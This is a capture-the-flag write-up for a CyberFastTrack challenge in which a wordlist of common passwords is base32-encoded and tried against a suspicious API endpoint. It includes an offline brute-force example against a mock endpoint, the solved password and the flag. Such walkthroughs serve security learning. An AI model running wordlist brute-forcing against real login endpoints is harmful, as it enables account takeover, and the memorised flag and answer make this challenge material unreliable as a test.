Endgame
- Cyber Catamounts
- Oct 2, 2020
Briefing:
Hi all, we've found an API endpoint that looks pretty suspicious. We know this hacker team is pretty bad on the defensive side, so we're sure that a word list of the 1k most common passwords will be of use. However, we have received intel that in order for you to gain access, the password must be encoded in base32. Good Luck!
Challenge credits to CyberFastTrack. Thank you for the learning resource!
So, we know a few things:
- The endpoint takes a password
- The password must be encoded in base32
- We have to try the word list of the 1k most common passwords
With some Googling, you can get the password list (We apologize, there's some profanity)
Here's a quick Python program to brute force the password:
I added some comments for understanding
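An added example, not the author's original script: the same wordlist loop run offline against a hypothetical `MockEndpoint` class that stands in for the challenge API, with a constructed six-word sample in place of the 1k list. It also shows why the base32 requirement adds no protection: base32 is a reversible encoding, and every guess is still a countable request on the server side.

```python
import base64
import binascii

# Constructed sample: a tiny stand-in for the 1k most-common-passwords list.
WORDLIST = ["123456", "password", "qwerty", "dragon", "coffee", "letmein"]


class MockEndpoint:
    """Hypothetical local stand-in for the challenge API (no network involved)."""

    def __init__(self, secret: str):
        self._secret = secret
        self.attempts = 0  # what a server-side rate limiter or alert would count

    def login(self, encoded: str) -> bool:
        self.attempts += 1
        try:
            # Strict decode: anything that is not valid base32 is rejected.
            candidate = base64.b32decode(encoded.encode("ascii"))
        except (binascii.Error, UnicodeEncodeError):
            return False
        return candidate == self._secret.encode("utf-8")


def b32(word: str) -> str:
    """Base32-encode a password the way the briefing requires."""
    return base64.b32encode(word.encode("utf-8")).decode("ascii")


def find_password(endpoint: MockEndpoint, words):
    """Try each word, base32-encoded; return the plaintext that is accepted."""
    for word in words:
        if endpoint.login(b32(word)):
            return word
    return None


if __name__ == "__main__":
    api = MockEndpoint("coffee")
    print(find_password(api, WORDLIST), "after", api.attempts, "attempts")
    print(b32("coffee"))
```
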

Guess what? You can do it with Bash too (and essentially any other programming language)!
Actually... Maybe not. This is an example of what a bash script could look like. The problem is that I can't find a good base32 encoder (I probably could figure it out if I did more research). I'm pretty sure it would function if the perl line was valid, so feel free to give it a go.
Go ahead and try it out for yourself:
Anyways, the password is coffee (wow so original, I know)!
Be sure to send your scripts in the #weekly-challenges channel!
Flag: Brutal_Encoding